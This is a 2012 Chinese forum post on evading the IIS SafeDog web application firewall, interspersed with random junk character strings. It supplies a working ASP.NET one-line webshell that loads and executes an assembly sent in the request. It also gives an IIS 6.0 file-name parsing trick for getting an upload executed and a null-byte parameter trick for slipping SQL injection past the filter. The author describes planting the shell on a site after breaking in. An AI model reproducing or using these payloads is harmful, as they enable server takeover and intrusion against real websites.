1、绕过IIS安全狗的一句话。3 U3 o. ?7 ?) L. R8 `( l0 q9 I
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
5 s8 }! i9 H" ?# ^5 y; S<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
; }6 u4 h& S! l$ V1 F# Q
5 G! E& h5 q( e8 p% F$ W' c2、IIS6.0解析漏洞遇到安全狗。
: C+ y8 B% Y* K" F# n* V! m/ f7 R文件名为
; A& g$ p& }, W# E) h, {7 p& F: X3 ^http://www.xxxxx.com/sh3llc0de.asp;1.jpg
0 t9 e; e. y0 J5 W
" I3 _7 y8 I( C7 [1 A这样的会被IIS安全狗果断屏蔽。: c' e! C6 n1 p: G- i) T1 B
改成如下名称,IIS6一样会解析:9 _6 d7 b1 _* v7 t2 e L9 M
www.xxxxx.com/;1.asp;1.jpg
6 C! J, l; X+ s& N! k" [2 V" h5 S. H
3、安全狗的注入绕过。
, s8 ~1 x7 K. I) `常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
$ g+ _) u! I+ x3 h7 t5 I5 G但如果:
2 F6 N/ B O, u- [" j" O. ?& \r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
, t: n9 y2 ]6 J) H, U: Q" D& T& j7 d就可以成功绕过了。
9 `/ X+ D, `0 s0 t
4 A4 `+ ?, E) U" t& L# C) t6 q9 [6 b/ O2 H
|
发表于 2012-10-31 08:25:30
收藏
支持
反对